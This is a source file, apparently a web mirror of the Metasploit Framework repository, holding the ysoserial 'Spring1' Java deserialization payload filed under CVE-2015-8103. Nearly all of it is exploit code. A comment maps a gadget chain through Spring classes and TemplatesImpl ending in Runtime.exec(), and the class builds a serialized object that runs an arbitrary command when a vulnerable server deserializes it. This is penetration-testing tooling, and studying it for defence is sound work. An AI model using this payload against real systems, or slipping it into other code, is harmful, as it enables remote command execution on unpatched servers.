CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/exploits/CVE-2015-8103/payloads/Spring1.java
Views: 11784
1
package ysoserial.payloads;

2


3
import static java.lang.Class.forName;

4


5
import java.lang.reflect.Constructor;

6
import java.lang.reflect.InvocationHandler;

7
import java.lang.reflect.Type;

8


9
import javax.xml.transform.Templates;

10


11
import org.springframework.beans.factory.ObjectFactory;

12


13
import ysoserial.payloads.annotation.Dependencies;

14
import ysoserial.payloads.util.Gadgets;

15
import ysoserial.payloads.util.PayloadRunner;

16
import ysoserial.payloads.util.Reflections;

17


18
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

19


20
/*

21
	Gadget chain:

22
	

23
		ObjectInputStream.readObject()

24
			SerializableTypeWrapper.MethodInvokeTypeProvider.readObject()

25
				SerializableTypeWrapper.TypeProvider(Proxy).getType()

26
					AnnotationInvocationHandler.invoke()

27
						HashMap.get()

28
				ReflectionUtils.findMethod()

29
				SerializableTypeWrapper.TypeProvider(Proxy).getType()

30
					AnnotationInvocationHandler.invoke()

31
						HashMap.get()			

32
				ReflectionUtils.invokeMethod()

33
					Method.invoke()	

34
						Templates(Proxy).newTransformer()

35
							AutowireUtils.ObjectFactoryDelegatingInvocationHandler.invoke()

36
								ObjectFactory(Proxy).getObject()

37
									AnnotationInvocationHandler.invoke()

38
										HashMap.get()	

39
								Method.invoke()

40
									TemplatesImpl.newTransformer()

41
										TemplatesImpl.getTransletInstance()

42
											TemplatesImpl.defineTransletClasses()

43
												TemplatesImpl.TransletClassLoader.defineClass()

44
													Pwner*(Javassist-generated).<static init>

45
														Runtime.exec()

46


47
 */

48


49
@SuppressWarnings({"restriction", "rawtypes"})

50
@Dependencies({"org.springframework:spring-core:4.1.4.RELEASE","org.springframework:spring-beans:4.1.4.RELEASE"})

51
public class Spring1 extends PayloadRunner implements ObjectPayload<Object> {

52
	

53
	public Object getObject(final String command) throws Exception {

54
		final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);

55
		

56
		final ObjectFactory objectFactoryProxy = 

57
				Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class);

58
		

59
		final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler) 

60
				Reflections.getFirstCtor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler")

61
					.newInstance(objectFactoryProxy), Type.class, Templates.class);

62
		

63
		final Object typeProviderProxy = Gadgets.createMemoitizedProxy(

64
				Gadgets.createMap("getType", typeTemplatesProxy), 

65
				forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));

66
		

67
		final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");

68
		final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0);

69
		Reflections.setFieldValue(mitp, "methodName", "newTransformer");

70


71
		return mitp;

72
	}

73


74
	public static void main(final String[] args) throws Exception {

75
		PayloadRunner.run(Spring1.class, args);

76
	}

77


78
}

79


80